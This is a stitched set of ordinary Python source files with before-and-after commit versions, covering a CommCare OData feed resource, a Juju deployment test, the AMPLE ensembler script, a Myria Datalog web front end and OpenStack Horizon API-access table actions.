    def obj_get_list(self, bundle, domain, **kwargs):
        """Build the (possibly location-restricted) ES query for the feed."""
        config = get_document_or_404(FormExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(gettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
        # Renamed loop variable: the original shadowed the `filter` builtin.
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())

        # Users without access_all_locations only see forms from their locations.
        if not bundle.request.couch_user.has_permission(
            domain, 'access_all_locations'
        ):
            query = query_location_restricted_forms(query, bundle.request)

        return query

    class Meta(v0_4.XFormInstanceResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/forms'
        serializer = ODataFormSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        """Route both the per-table and single-table feed URL forms."""
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
|
#!/usr/bin/env python
from __future__ import print_function
__metaclass__ = type
from argparse import ArgumentParser
import os
import subprocess
import sys
from time import sleep
from jujupy import (
CannotConnectEnv,
Environment,
start_libvirt_domain,
stop_libvirt_domain,
verify_libvirt_domain_running,
)
def deploy_stack(environment, debug, machines):
    """Deploy a test stack in the specified environment.

    :param environment: The name of the desired environment.
    :param debug: Whether to enable debug output on the juju client.
    :param machines: libvirt machines as 'name@hypervisor_URI' strings.
    """
    env = Environment.from_config(environment)
    env.client.debug = debug
    running_domains = dict()
    if env.config['type'] == 'maas':
        # Split the hypervisor_URI and machine name
        for machine in machines:
            name, URI = machine.split('@')
            # Record already running domains, so they can be left running,
            # if already running; otherwise start them.
            # BUG FIX: add an entry per machine instead of rebinding the whole
            # dict, which previously remembered only the last machine and so
            # skipped stopping the others in the cleanup loop below.
            if verify_libvirt_domain_running(URI, name):
                running_domains[machine] = True
            else:
                running_domains[machine] = False
                print("Attempting to start %s at %s" % (name, URI))
                status_msg = start_libvirt_domain(URI, name)
                print("%s" % status_msg)
    # Clean up any leftover junk
    env.destroy_environment()
    env.bootstrap()
    try:
        # wait for status info....
        try:
            try:
                env.get_status()
            except CannotConnectEnv:
                print("Status got Unable to connect to env. Retrying...")
                env.get_status()
            env.wait_for_started()
        except subprocess.CalledProcessError as e:
            if getattr(e, 'stderr', None) is not None:
                sys.stderr.write(e.stderr)
            raise
    finally:
        env.destroy_environment()
        if env.config['type'] == 'maas':
            sleep(90)
            for machine, running in running_domains.items():
                if not running:
                    name, URI = machine.split('@')
                    status_msg = stop_libvirt_domain(URI, name)
                    print("%s" % status_msg)
def main():
    """Parse command-line arguments and run the cloud deployment test."""
    parser = ArgumentParser('Test a cloud')
    parser.add_argument('env', help='The juju environment to test')
    parser.add_argument('--machine', help='KVM machine to start.',
                        action='append', default=[])
    args = parser.parse_args()
    # DEBUG=true in the environment enables client debug output.
    debug = os.environ.get('DEBUG') == 'true'
    try:
        deploy_stack(args.env, debug, args.machine)
    except Exception as e:
        print('%s: %s' % (type(e), e))
        sys.exit(1)
# Script entry point; keeps the module importable without side effects.
if __name__ == '__main__':
    main()
cloud_deploy.py: Deploy dummy-source and dummy-sink.
#!/usr/bin/env python
from __future__ import print_function
__metaclass__ = type
from argparse import ArgumentParser
import os
import subprocess
import sys
from time import sleep
from deploy_stack import deploy_dummy_stack
from jujupy import (
CannotConnectEnv,
Environment,
start_libvirt_domain,
stop_libvirt_domain,
verify_libvirt_domain_running,
)
def deploy_stack(environment, debug, machines):
    """Deploy a test stack in the specified environment.

    :param environment: The name of the desired environment.
    :param debug: Whether to enable debug output on the juju client.
    :param machines: libvirt machines as 'name@hypervisor_URI' strings.
    """
    env = Environment.from_config(environment)
    env.client.debug = debug
    running_domains = dict()
    if env.config['type'] == 'maas':
        # Split the hypervisor_URI and machine name
        for machine in machines:
            name, URI = machine.split('@')
            # Record already running domains, so they can be left running,
            # if already running; otherwise start them.
            # BUG FIX: add an entry per machine instead of rebinding the whole
            # dict, which previously remembered only the last machine and so
            # skipped stopping the others in the cleanup loop below.
            if verify_libvirt_domain_running(URI, name):
                running_domains[machine] = True
            else:
                running_domains[machine] = False
                print("Attempting to start %s at %s" % (name, URI))
                status_msg = start_libvirt_domain(URI, name)
                print("%s" % status_msg)
    # Clean up any leftover junk
    env.destroy_environment()
    env.bootstrap()
    try:
        # wait for status info....
        try:
            try:
                env.get_status()
            except CannotConnectEnv:
                print("Status got Unable to connect to env. Retrying...")
                env.get_status()
            env.wait_for_started()
            deploy_dummy_stack(
                env, 'local:{}/'.format(env.config.get(
                    'default-series', 'precise')))
        except subprocess.CalledProcessError as e:
            if getattr(e, 'stderr', None) is not None:
                sys.stderr.write(e.stderr)
            raise
    finally:
        env.destroy_environment()
        if env.config['type'] == 'maas':
            sleep(90)
            for machine, running in running_domains.items():
                if not running:
                    name, URI = machine.split('@')
                    status_msg = stop_libvirt_domain(URI, name)
                    print("%s" % status_msg)
def main():
    """Parse command-line arguments and run the cloud deployment test."""
    parser = ArgumentParser('Test a cloud')
    parser.add_argument('env', help='The juju environment to test')
    parser.add_argument('--machine', help='KVM machine to start.',
                        action='append', default=[])
    args = parser.parse_args()
    # DEBUG=true in the environment enables client debug output.
    debug = os.environ.get('DEBUG') == 'true'
    try:
        deploy_stack(args.env, debug, args.machine)
    except Exception as e:
        print('%s: %s' % (type(e), e))
        sys.exit(1)
# Script entry point; keeps the module importable without side effects.
if __name__ == '__main__':
    main()
|
#!/usr/bin/env ccp4-python
__author__ = "Jens Thomas, and Felix Simkovic"
__date__ = "01 Oct 2016"
__version__ = "1.0"
import argparse
import os
import sys
from ample.constants import AMPLE_PKL
from ample import ensembler
from ample.util import ample_util, config_util, exit_util, logging_util, process_models
from ample.util import argparse_util
from ample.util.options_processor import process_ensemble_options
ENSEMBLE_DIRNAME = 'ample_ensemble'

# Command-line interface for running AMPLE's ensembling stage standalone.
parser = argparse.ArgumentParser(description="AMPLE Ensembling Module")
argparse_util.add_general_options(parser)
argparse_util.add_cluster_submit_options(parser)
argparse_util.add_ensembler_options(parser)

# Get command-line arguments and see if we have a restart_pkl option as this
# is how we pass in an existing ample dictionary when we are running the ensembling
# as a standalone job on a cluster
args = parser.parse_args()
optd = vars(args)

# Track restart as it determines if we need to unpack models
restart = False
if 'restart_pkl' in optd and optd['restart_pkl']:
    if not os.path.isfile(optd['restart_pkl']):
        msg = 'Cannot find ensemble pkl file: {0}'.format(optd['restart_pkl'])
        exit_util.exit_error(msg)
    try:
        optd = ample_util.read_amoptd(optd['restart_pkl'])
    except Exception as e:
        # BUG FIX: Exception has no .message attribute on Python 3 (and it was
        # deprecated since Python 2.6); format the exception object itself.
        msg = "Error unpickling ensemble pkl: {0}".format(e)
        exit_util.exit_error(msg, sys.exc_info()[2])
    restart = True
else:
    # We're running purely from command-line arguments
    amopt = config_util.AMPLEConfigOptions()
    amopt.populate(args)
    optd = amopt.d

# Start logging to the console
logger = logging_util.setup_console_logging()

# Make sure we have models if in standalone mode
if not restart and not ('models' in optd and optd['models'] and os.path.exists(optd['models'])):
    msg = 'AMPLE ensembler requires a -models argument with a file/directory of pdbs'
    exit_util.exit_error(msg, sys.exc_info()[2])

# Set up the working directory if one doesn't already exist
if not ('work_dir' in optd and optd['work_dir']):
    optd['work_dir'] = os.path.join(os.path.abspath(os.path.curdir), ENSEMBLE_DIRNAME)
if not os.path.isdir(optd['work_dir']):
    try:
        os.mkdir(optd['work_dir'])
    except OSError as e:
        msg = 'Error making ensemble workdir {0} : {1}'.format(optd['work_dir'], e)
        exit_util.exit_error(msg, sys.exc_info()[2])
assert os.path.isdir(optd['work_dir'])

# Start logging to a file
logging_util.setup_file_logging(os.path.join(optd['work_dir'], "ensemble.log"))

try:
    if not restart:
        results = process_models.extract_and_validate_models(optd)
        process_models.handle_model_import(optd, results)
    process_ensemble_options(optd)
    optd['ensemble_ok'] = os.path.join(optd['work_dir'], 'ensemble.ok')
    optd['results_path'] = os.path.join(optd['work_dir'], AMPLE_PKL)
    ensembler.create_ensembles(optd)
    ample_util.save_amoptd(optd)
except Exception as e:
    # BUG FIX: see above — str(e), not e.message.
    msg = "Error running ensembling: {0}".format(e)
    exit_util.exit_error(msg, sys.exc_info()[2])
Minor fix: build the options dict directly with vars(parser.parse_args()) and populate AMPLEConfigOptions from that dict instead of the raw Namespace.
#!/usr/bin/env ccp4-python
__author__ = "Jens Thomas, and Felix Simkovic"
__date__ = "01 Oct 2016"
__version__ = "1.0"
import argparse
import os
import sys
from ample.constants import AMPLE_PKL
from ample import ensembler
from ample.util import ample_util, config_util, exit_util, logging_util, process_models
from ample.util import argparse_util
from ample.util.options_processor import process_ensemble_options
ENSEMBLE_DIRNAME = 'ample_ensemble'

# Command-line interface for running AMPLE's ensembling stage standalone.
parser = argparse.ArgumentParser(description="AMPLE Ensembling Module")
argparse_util.add_general_options(parser)
argparse_util.add_cluster_submit_options(parser)
argparse_util.add_ensembler_options(parser)

# Get command-line arguments and see if we have a restart_pkl option as this
# is how we pass in an existing ample dictionary when we are running the ensembling
# as a standalone job on a cluster
optd = vars(parser.parse_args())

# Track restart as it determines if we need to unpack models
restart = False
if 'restart_pkl' in optd and optd['restart_pkl']:
    if not os.path.isfile(optd['restart_pkl']):
        msg = 'Cannot find ensemble pkl file: {0}'.format(optd['restart_pkl'])
        exit_util.exit_error(msg)
    try:
        optd = ample_util.read_amoptd(optd['restart_pkl'])
    except Exception as e:
        # BUG FIX: Exception has no .message attribute on Python 3 (and it was
        # deprecated since Python 2.6); format the exception object itself.
        msg = "Error unpickling ensemble pkl: {0}".format(e)
        exit_util.exit_error(msg, sys.exc_info()[2])
    restart = True
else:
    # We're running purely from command-line arguments
    amopt = config_util.AMPLEConfigOptions()
    amopt.populate(optd)
    optd = amopt.d

# Start logging to the console
logger = logging_util.setup_console_logging()

# Make sure we have models if in standalone mode
if not restart and not ('models' in optd and optd['models'] and os.path.exists(optd['models'])):
    msg = 'AMPLE ensembler requires a -models argument with a file/directory of pdbs'
    exit_util.exit_error(msg, sys.exc_info()[2])

# Set up the working directory if one doesn't already exist
if not ('work_dir' in optd and optd['work_dir']):
    optd['work_dir'] = os.path.join(os.path.abspath(os.path.curdir), ENSEMBLE_DIRNAME)
if not os.path.isdir(optd['work_dir']):
    try:
        os.mkdir(optd['work_dir'])
    except OSError as e:
        msg = 'Error making ensemble workdir {0} : {1}'.format(optd['work_dir'], e)
        exit_util.exit_error(msg, sys.exc_info()[2])
assert os.path.isdir(optd['work_dir'])

# Start logging to a file
logging_util.setup_file_logging(os.path.join(optd['work_dir'], "ensemble.log"))

try:
    if not restart:
        results = process_models.extract_and_validate_models(optd)
        process_models.handle_model_import(optd, results)
    process_ensemble_options(optd)
    optd['ensemble_ok'] = os.path.join(optd['work_dir'], 'ensemble.ok')
    optd['results_path'] = os.path.join(optd['work_dir'], AMPLE_PKL)
    ensembler.create_ensembles(optd)
    ample_util.save_amoptd(optd)
except Exception as e:
    # BUG FIX: see above — str(e), not e.message.
    msg = "Error running ensembling: {0}".format(e)
    exit_util.exit_error(msg, sys.exc_info()[2])
|
from raco import RACompiler
from raco.language import MyriaAlgebra
from raco.myrialang import compile_to_json
from raco.viz import plan_to_dot
from google.appengine.ext.webapp import template
import json
import myria
import os.path
import webapp2
# Query pre-loaded into the editor page.
defaultquery = """A(x) :- R(x,3)"""
# Location of the Myria REST server used by all handlers below.
hostname = "localhost"
port = 8753
def programplan(query, target):
    """Parse *query* as Datalog and return its logical plan.

    NOTE(review): the *target* parameter is currently unused — confirm
    whether optimizing toward *target* was intended here.
    """
    dlog = RACompiler()
    dlog.fromDatalog(query)
    return dlog.logicalplan
def format_rule(expressions):
    """Render (name, expression) pairs, one 'name = expression' per line."""
    rendered = ["%s = %s" % pair for pair in expressions]
    return "\n".join(rendered)
class MainPage(webapp2.RequestHandler):
    """Serve the interactive Datalog query editor page."""

    def get(self, query=defaultquery):
        dlog = RACompiler()
        dlog.fromDatalog(query)
        plan = format_rule(dlog.logicalplan)
        dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
        myria_plan = format_rule(dlog.physicalplan)
        self.response.headers['Content-Type'] = 'text/html'
        path = os.path.join(os.path.dirname(__file__), 'templates/editor.html')
        # Probe the REST server so the page can show connection state.
        try:
            connection = myria.MyriaConnection(hostname=hostname, port=port)
            workers = connection.workers()
            connection_string = "(%s:%d [%d workers])" % (hostname, port, len(workers))
        except myria.MyriaError:
            connection_string = "(unable to connect to %s:%d)" % (hostname, port)
        # locals() hands plan/myria_plan/connection_string to the template.
        self.response.out.write(template.render(path, locals()))
class Plan(webapp2.RequestHandler):
    """Render the logical plan for a Datalog query as plain text."""

    def get(self):
        compiler = RACompiler()
        compiler.fromDatalog(self.request.get("query"))
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write(format_rule(compiler.logicalplan))
class Optimize(webapp2.RequestHandler):
    """Render the optimized (physical) plan for a Datalog query."""

    def get(self):
        compiler = RACompiler()
        compiler.fromDatalog(self.request.get("query"))
        compiler.optimize(target=MyriaAlgebra,
                          eliminate_common_subexpressions=False)
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write(format_rule(compiler.physicalplan))
class Compile(webapp2.RequestHandler):
    """Compile a Datalog query to the Myria JSON plan format."""

    def get(self):
        query = self.request.get("query")
        compiler = RACompiler()
        compiler.fromDatalog(query)
        # Capture the logical plan before optimize() replaces it.
        logical = str(compiler.logicalplan)
        compiler.optimize(target=MyriaAlgebra,
                          eliminate_common_subexpressions=False)
        payload = compile_to_json(query, logical, compiler.physicalplan)
        self.response.headers['Content-Type'] = 'application/json'
        self.response.write(json.dumps(payload))
class Execute(webapp2.RequestHandler):
    """Compile a Datalog query, submit it to Myria, and report its status."""

    def post(self):
        """Compile and submit the query; 201 with a status URL on success."""
        try:
            connection = myria.MyriaConnection(hostname=hostname, port=port)
        except myria.MyriaError:
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.write("Unable to connect to REST server to issue query")
            self.response.status = 503
            return

        query = self.request.get("query")
        dlog = RACompiler()
        dlog.fromDatalog(query)
        # Cache logical plan
        cached_logicalplan = str(dlog.logicalplan)
        # Generate physical plan
        dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
        compiled = compile_to_json(query, cached_logicalplan, dlog.physicalplan)
        # Issue the query
        try:
            query_status = connection.submit_query(compiled)
            query_url = 'http://%s:%d/execute?query_id=%d' % (hostname, port, query_status['query_id'])
            ret = {'query_status' : query_status, 'url' : query_url}
            self.response.status = 201
            self.response.headers['Content-Type'] = 'application/json'
            self.response.headers['Content-Location'] = query_url
            self.response.write(json.dumps(ret))
            return
        except myria.MyriaError as e:
            # Submission rejected by the server: report it as a client error.
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.status = 400
            self.response.write(e)
            return

    def get(self):
        """Look up the status of a previously submitted query by query_id."""
        try:
            connection = myria.MyriaConnection(hostname=hostname, port=port)
        except myria.MyriaError:
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.status = 503
            self.response.write("Unable to connect to REST server to issue query")
            return
        query_id = self.request.get("query_id")
        try:
            query_status = connection.get_query_status(query_id)
            self.response.headers['Content-Type'] = 'application/json'
            ret = {'query_status' : query_status, 'url' : self.request.url}
            self.response.write(json.dumps(ret))
        except myria.MyriaError as e:
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.write(e)
class Dot(webapp2.RequestHandler):
    """Render a query plan in Graphviz dot format."""

    def get(self):
        query = self.request.get("query")
        svg_type = self.request.get("type")
        dlog = RACompiler()
        dlog.fromDatalog(query)
        # type="ra" (or absent) renders the logical plan; "myria" the physical.
        if svg_type is None or len(svg_type) == 0 or svg_type.lower() == "ra":
            plan = dlog.logicalplan
        elif svg_type.lower() == "myria":
            dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
            plan = dlog.physicalplan
        else:
            self.abort(400, detail="argument type expected 'ra' or 'myria'")
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write(plan_to_dot(plan))
# URL routing for the Datalog editor web application.
app = webapp2.WSGIApplication([
    ('/', MainPage),
    ('/plan', Plan),
    ('/optimize', Optimize),
    ('/compile', Compile),
    ('/execute', Execute),
    ('/dot', Dot)
],
    debug=True
)
"""
TODO:
Debug conditions: A(x,z) :- R(x,p1,y),R(y,p2,z),R(z,p3,w)
Multiple rules
Recursion
Show graph visually
Protobuf
Show parse errors (with link to error)
"""
Retarget to deployment on DB cluster
Signed-off-by: Daniel Halperin <1a02732a15f637c31107256cbee5819e36aa7c67@cs.washington.edu>
from raco import RACompiler
from raco.language import MyriaAlgebra
from raco.myrialang import compile_to_json
from raco.viz import plan_to_dot
from google.appengine.ext.webapp import template
import json
import myria
import os.path
import webapp2
# Query pre-loaded into the editor page.
defaultquery = """A(x) :- R(x,3)"""
# Location of the Myria REST server (production DB cluster deployment).
hostname = "vega.cs.washington.edu"
port = 1776
def programplan(query, target):
    """Parse *query* as Datalog and return its logical plan.

    NOTE(review): the *target* parameter is currently unused — confirm
    whether optimizing toward *target* was intended here.
    """
    dlog = RACompiler()
    dlog.fromDatalog(query)
    return dlog.logicalplan
def format_rule(expressions):
    """Render (name, expression) pairs, one 'name = expression' per line."""
    rendered = ["%s = %s" % pair for pair in expressions]
    return "\n".join(rendered)
class MainPage(webapp2.RequestHandler):
    """Serve the interactive Datalog query editor page."""

    def get(self, query=defaultquery):
        dlog = RACompiler()
        dlog.fromDatalog(query)
        plan = format_rule(dlog.logicalplan)
        dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
        myria_plan = format_rule(dlog.physicalplan)
        self.response.headers['Content-Type'] = 'text/html'
        path = os.path.join(os.path.dirname(__file__), 'templates/editor.html')
        # Probe the REST server so the page can show connection state.
        try:
            connection = myria.MyriaConnection(hostname=hostname, port=port)
            workers = connection.workers()
            connection_string = "(%s:%d [%d workers])" % (hostname, port, len(workers))
        except myria.MyriaError:
            connection_string = "(unable to connect to %s:%d)" % (hostname, port)
        # locals() hands plan/myria_plan/connection_string to the template.
        self.response.out.write(template.render(path, locals()))
class Plan(webapp2.RequestHandler):
    """Render the logical plan for a Datalog query as plain text."""

    def get(self):
        compiler = RACompiler()
        compiler.fromDatalog(self.request.get("query"))
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write(format_rule(compiler.logicalplan))
class Optimize(webapp2.RequestHandler):
    """Render the optimized (physical) plan for a Datalog query."""

    def get(self):
        compiler = RACompiler()
        compiler.fromDatalog(self.request.get("query"))
        compiler.optimize(target=MyriaAlgebra,
                          eliminate_common_subexpressions=False)
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write(format_rule(compiler.physicalplan))
class Compile(webapp2.RequestHandler):
    """Compile a Datalog query to the Myria JSON plan format."""

    def get(self):
        query = self.request.get("query")
        compiler = RACompiler()
        compiler.fromDatalog(query)
        # Capture the logical plan before optimize() replaces it.
        logical = str(compiler.logicalplan)
        compiler.optimize(target=MyriaAlgebra,
                          eliminate_common_subexpressions=False)
        payload = compile_to_json(query, logical, compiler.physicalplan)
        self.response.headers['Content-Type'] = 'application/json'
        self.response.write(json.dumps(payload))
class Execute(webapp2.RequestHandler):
    """Compile a Datalog query, submit it to Myria, and report its status."""

    def post(self):
        """Compile and submit the query; 201 with a status URL on success."""
        try:
            connection = myria.MyriaConnection(hostname=hostname, port=port)
        except myria.MyriaError:
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.write("Unable to connect to REST server to issue query")
            self.response.status = 503
            return

        query = self.request.get("query")
        dlog = RACompiler()
        dlog.fromDatalog(query)
        # Cache logical plan
        cached_logicalplan = str(dlog.logicalplan)
        # Generate physical plan
        dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
        compiled = compile_to_json(query, cached_logicalplan, dlog.physicalplan)
        # Issue the query
        try:
            query_status = connection.submit_query(compiled)
            query_url = 'http://%s:%d/execute?query_id=%d' % (hostname, port, query_status['query_id'])
            ret = {'query_status' : query_status, 'url' : query_url}
            self.response.status = 201
            self.response.headers['Content-Type'] = 'application/json'
            self.response.headers['Content-Location'] = query_url
            self.response.write(json.dumps(ret))
            return
        except myria.MyriaError as e:
            # Submission rejected by the server: report it as a client error.
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.status = 400
            self.response.write(e)
            return

    def get(self):
        """Look up the status of a previously submitted query by query_id."""
        try:
            connection = myria.MyriaConnection(hostname=hostname, port=port)
        except myria.MyriaError:
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.status = 503
            self.response.write("Unable to connect to REST server to issue query")
            return
        query_id = self.request.get("query_id")
        try:
            query_status = connection.get_query_status(query_id)
            self.response.headers['Content-Type'] = 'application/json'
            ret = {'query_status' : query_status, 'url' : self.request.url}
            self.response.write(json.dumps(ret))
        except myria.MyriaError as e:
            self.response.headers['Content-Type'] = 'text/plain'
            self.response.write(e)
class Dot(webapp2.RequestHandler):
    """Render a query plan in Graphviz dot format."""

    def get(self):
        query = self.request.get("query")
        svg_type = self.request.get("type")
        dlog = RACompiler()
        dlog.fromDatalog(query)
        # type="ra" (or absent) renders the logical plan; "myria" the physical.
        if svg_type is None or len(svg_type) == 0 or svg_type.lower() == "ra":
            plan = dlog.logicalplan
        elif svg_type.lower() == "myria":
            dlog.optimize(target=MyriaAlgebra, eliminate_common_subexpressions=False)
            plan = dlog.physicalplan
        else:
            self.abort(400, detail="argument type expected 'ra' or 'myria'")
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write(plan_to_dot(plan))
# URL routing for the Datalog editor web application.
app = webapp2.WSGIApplication([
    ('/', MainPage),
    ('/plan', Plan),
    ('/optimize', Optimize),
    ('/compile', Compile),
    ('/execute', Execute),
    ('/dot', Dot)
],
    debug=True
)
"""
TODO:
Debug conditions: A(x,z) :- R(x,p1,y),R(y,p2,z),R(z,p3,w)
Multiple rules
Recursion
Show graph visually
Protobuf
Show parse errors (with link to error)
"""
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template.defaultfilters import title
from django.utils.translation import ugettext_lazy as _
from openstack_auth import utils
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.api_access import forms
from openstack_dashboard import policy
def pretty_service_names(name):
    """Return a human-friendly display name for a service type."""
    name = name.replace('-', ' ')
    # Acronym services are fully capitalized; everything else is title-cased.
    if name in ('ec2', 's3'):
        return name.upper()
    return title(name)
class DownloadEC2(tables.LinkAction):
    """Table action linking to the EC2 credentials download view."""
    name = "download_ec2"
    verbose_name = _("Download EC2 Credentials")
    verbose_name_plural = _("Download EC2 Credentials")
    icon = "download"
    # BUG FIX: api_access moved out of access_and_security into its own panel
    # (blueprint reorganise-access-and-security); the old URL name no longer
    # resolves.
    url = "horizon:project:api_access:ec2"
    policy_rules = (("compute", "os_compute_api:os-certificates:create"),)

    def allowed(self, request, datum=None):
        # Only show the action when the EC2 service is available.
        return api.base.is_service_enabled(request, 'ec2')
class DownloadCloudsYaml(tables.LinkAction):
    """Table action linking to the clouds.yaml download view."""
    name = "download_clouds_yaml"
    verbose_name = _("Download OpenStack clouds.yaml File")
    verbose_name_plural = _("Download OpenStack clouds.yaml File")
    icon = "download"
    url = "horizon:project:api_access:clouds.yaml"
class DownloadOpenRC(tables.LinkAction):
    """Table action linking to the Identity v3 openrc download view."""
    name = "download_openrc"
    verbose_name = _("Download OpenStack RC File v3")
    verbose_name_plural = _("Download OpenStack RC File v3")
    icon = "download"
    url = "horizon:project:api_access:openrc"

    def allowed(self, request, datum=None):
        # The v3 RC file only makes sense against Keystone v3 or newer.
        return utils.get_keystone_version() >= 3
class DownloadOpenRCv2(tables.LinkAction):
    """Table action linking to the Identity v2.0 openrc download view."""
    name = "download_openrc_v2"
    verbose_name = _("Download OpenStack RC File v2.0")
    verbose_name_plural = _("Download OpenStack RC File v2.0")
    icon = "download"
    url = "horizon:project:api_access:openrcv2"
class ViewCredentials(tables.LinkAction):
    """Table action opening the credentials view in a modal dialog."""
    name = "view_credentials"
    verbose_name = _("View Credentials")
    classes = ("ajax-modal", )
    icon = "eye"
    url = "horizon:project:api_access:view_credentials"
class RecreateCredentials(tables.LinkAction):
    """Table action to delete and recreate the user's EC2 credentials."""
    name = "recreate_credentials"
    verbose_name = _("Recreate EC2 Credentials")
    classes = ("ajax-modal",)
    icon = "refresh"
    # BUG FIX: api_access moved out of access_and_security into its own panel;
    # the old URL name no longer resolves.
    url = "horizon:project:api_access:recreate_credentials"
    # BUG FIX: trailing comma added — without it policy_rules was a single
    # flat ("compute", "...") tuple rather than a tuple of (service, rule)
    # pairs, inconsistent with DownloadEC2.policy_rules above.
    policy_rules = (("compute", "os_compute_api:certificates:create"),)
    action_type = "danger"

    def allowed(self, request, datum=None):
        # Shown only when EC2 is enabled, credentials already exist, and the
        # user may both create and delete EC2 credentials for themselves.
        try:
            target = {"target.credential.user_id": request.user.id}
            if (api.base.is_service_enabled(request, 'ec2') and
                    forms.get_ec2_credentials(request) and
                    policy.check((("identity", "identity:ec2_create_credential"),
                                  ("identity", "identity:ec2_delete_credential")),
                                 request, target=target)):
                return True
        except Exception:
            # Best-effort visibility check: hide the action on any failure.
            pass
        return False
class EndpointsTable(tables.DataTable):
    """Table of available API service endpoints with credential actions."""
    api_name = tables.Column('type',
                             verbose_name=_("Service"),
                             filters=(pretty_service_names,))
    api_endpoint = tables.Column('public_url',
                                 verbose_name=_("Service Endpoint"))

    class Meta(object):
        name = "endpoints"
        verbose_name = _("API Endpoints")
        multi_select = False
        table_actions = (DownloadCloudsYaml, DownloadOpenRCv2, DownloadOpenRC,
                         DownloadEC2,
                         ViewCredentials, RecreateCredentials)
Fix EC2 related buttons url in the api access page
access_and_security has moved to separate panel since
https://blueprints.launchpad.net/horizon/+spec/reorganise-access-and-security,
but Download/Recreate EC2 Credentials url were not updated.
Change-Id: Ie16aabb7c272ef871138c59737e694966d7f5168
Closes-Bug: #1686088
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template.defaultfilters import title
from django.utils.translation import ugettext_lazy as _
from openstack_auth import utils
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.api_access import forms
from openstack_dashboard import policy
def pretty_service_names(name):
    """Return a human-friendly display name for a service type.

    Hyphens become spaces; the well-known acronyms 'ec2' and 's3' are
    upper-cased, everything else is title-cased.
    """
    cleaned = name.replace('-', ' ')
    if cleaned in ('ec2', 's3'):
        return cleaned.upper()
    return title(cleaned)
class DownloadEC2(tables.LinkAction):
    """Table action that downloads the user's EC2 credentials archive."""
    name = "download_ec2"
    verbose_name = _("Download EC2 Credentials")
    verbose_name_plural = _("Download EC2 Credentials")
    icon = "download"
    url = "horizon:project:api_access:ec2"
    policy_rules = (("compute", "os_compute_api:os-certificates:create"),)

    def allowed(self, request, datum=None):
        # Only show the button when the EC2 service is available.
        return api.base.is_service_enabled(request, 'ec2')
class DownloadCloudsYaml(tables.LinkAction):
    """Table action that downloads a clouds.yaml configuration file."""
    name = "download_clouds_yaml"
    verbose_name = _("Download OpenStack clouds.yaml File")
    verbose_name_plural = _("Download OpenStack clouds.yaml File")
    icon = "download"
    url = "horizon:project:api_access:clouds.yaml"
class DownloadOpenRC(tables.LinkAction):
    """Table action that downloads the Keystone v3 openrc file."""
    name = "download_openrc"
    verbose_name = _("Download OpenStack RC File v3")
    verbose_name_plural = _("Download OpenStack RC File v3")
    icon = "download"
    url = "horizon:project:api_access:openrc"

    def allowed(self, request, datum=None):
        # The v3 RC file only makes sense when Keystone v3+ is in use.
        return utils.get_keystone_version() >= 3
class DownloadOpenRCv2(tables.LinkAction):
    """Table action that downloads the Keystone v2.0 openrc file."""
    name = "download_openrc_v2"
    verbose_name = _("Download OpenStack RC File v2.0")
    verbose_name_plural = _("Download OpenStack RC File v2.0")
    icon = "download"
    url = "horizon:project:api_access:openrcv2"
class ViewCredentials(tables.LinkAction):
    """Table action that opens a modal showing the user's credentials."""
    name = "view_credentials"
    verbose_name = _("View Credentials")
    classes = ("ajax-modal", )
    icon = "eye"
    url = "horizon:project:api_access:view_credentials"
class RecreateCredentials(tables.LinkAction):
    """Table action that deletes and re-creates the user's EC2 credentials."""
    name = "recreate_credentials"
    verbose_name = _("Recreate EC2 Credentials")
    classes = ("ajax-modal",)
    icon = "refresh"
    url = "horizon:project:api_access:recreate_credentials"
    # BUG FIX: the inner tuple previously lacked a trailing comma, so
    # policy_rules was a single ("compute", "<rule>") pair of strings instead
    # of a sequence of (service, rule) pairs as the policy machinery expects
    # (compare DownloadEC2.policy_rules).
    # NOTE(review): DownloadEC2 uses "os_compute_api:os-certificates:create";
    # confirm which rule name is intended here.
